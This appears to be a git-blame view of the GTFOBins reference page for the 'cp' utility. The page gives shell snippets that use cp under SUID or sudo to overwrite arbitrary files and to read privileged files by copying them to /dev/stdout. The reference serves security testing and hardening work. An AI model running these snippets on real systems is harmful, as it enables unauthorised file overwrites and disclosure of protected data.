1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00
GTFOBins.github.io/_gtfobins/cp.md

22 lines
639 B
Markdown
Raw Normal View History

2018-09-03 22:33:24 +02:00
---
2018-09-03 22:40:09 +02:00
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
2018-09-03 22:33:24 +02:00
functions:
2018-10-05 19:55:38 +02:00
suid:
2018-09-03 22:33:24 +02:00
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./cp $TF $LFILE
2018-10-05 19:55:38 +02:00
sudo:
2018-09-03 22:33:24 +02:00
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
sudo cp $TF $LFILE
2020-03-21 19:12:58 +01:00
file-read:
- description: It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system. The path must be absolute.
code: |
LFILE=file_to_read
cp "$LFILE" /dev/stdout
2018-09-03 22:33:24 +02:00
---